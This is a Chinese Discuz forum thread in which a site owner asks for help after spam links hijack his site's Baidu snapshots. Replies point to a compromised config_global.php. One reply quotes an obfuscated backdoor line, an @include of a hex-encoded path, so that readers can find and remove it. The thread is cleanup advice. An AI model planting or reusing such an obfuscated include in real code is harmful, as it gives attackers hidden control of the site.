返回列表 发帖

[求助] 求助升级最新版网站被非法内容劫持百度快照

渐入佳境

我这个站www.3811111.com前几天才上传的6.22最新版
昨天发现百度收录出现很多违法信息快照,以帖子好链接形式出现,门户的链接也出现,数字没有那么大,因为网站没有那么多帖子,搞不懂是咋回事了,换了一个服务器还是一样

我知道答案 回答被采纳将会获得1 贡献 已有9人回答
中国家电维修网http://www.3811111.com
家电维修网 http://www.bjjdwx.com

炉火纯青

哥们儿你网站被域名劫持了  找个懂的人给你看看吧。

屏幕快照 2019-08-26 下午7.53.18.png

炉火纯青

点击进入这个网站
屏幕快照 2019-08-26 下午7.54.12.png

功行圆满

config下的config_global.php文件,找找恶意代码,如:

@include(PACK('H*','443A2F777777726F6F742F78676C6C2E636F6D2F75706C6F61642F696E7374616C6C2F696E636C7564652F696E7374616C6C5F63696E74656E2E706870'));

近似的字符,直接删除

更新缓存

渐入佳境

allthebest 发表于 2019-8-26 20:19
config下的config_global.php文件,找找恶意代码,如:

@include(PACK('H*','443A2F777777726F6F742F78676 ...

谢谢,我重新更换了服务器,备份数据库下载最新的程序恢复,还是不行现在服务器爬满了蜘蛛,蜘蛛爬那些链接都是数字很大的,说明根本不是爬我论坛的帖子
中国家电维修网http://www.3811111.com
家电维修网 http://www.bjjdwx.com

功行圆满

ghz0433 发表于 2019-8-27 00:10
谢谢,我重新更换了服务器,备份数据库下载最新的程序恢复,还是不行现在服务器爬满了蜘蛛,蜘蛛爬那些链 ...

这与config下的config_global.php文件有关,检查权限设置

Fox
头像被屏蔽

禁止访问

初学乍练

QQ
allthebest 发表于 2019-8-26 20:19

@include(PACK('H*','443A2F777777726F6F742F78676 ...

一万个赞!!!我跟楼主也一样的
看到里面有@clude的这串代码
请问还有哪些目录呢?一起处理

应用开发者

QQ
高二天 发表于 2019-10-17 11:52
一万个赞!!!我跟楼主也一样的
看到里面有@clude的这串代码
请问还有哪些目录呢?一起处理 ...

建议官方文件恢复下 比较快
无限星辰工作室  好集导航 免费API
服务Discuz建站|定制|小程序|APP定制|故障维修|搬家|运维|挂马清理|防护|性能优化|安全运维|
服务理念:专业 诚信 友好QQ842062626 服务

应用开发者

discuz 老兵

QQ

木马问题不是在程序本身,而是服务器的权限, 是某种的木马伪装成图片 通过上传头像 帖子等方式就上传到你服务器上了,要命的是你服务器还允许执行,
单纯的清理木马没用的 要服务器的安全最主要
您可以加我QQ交谈,有偿服务,专业清理+安防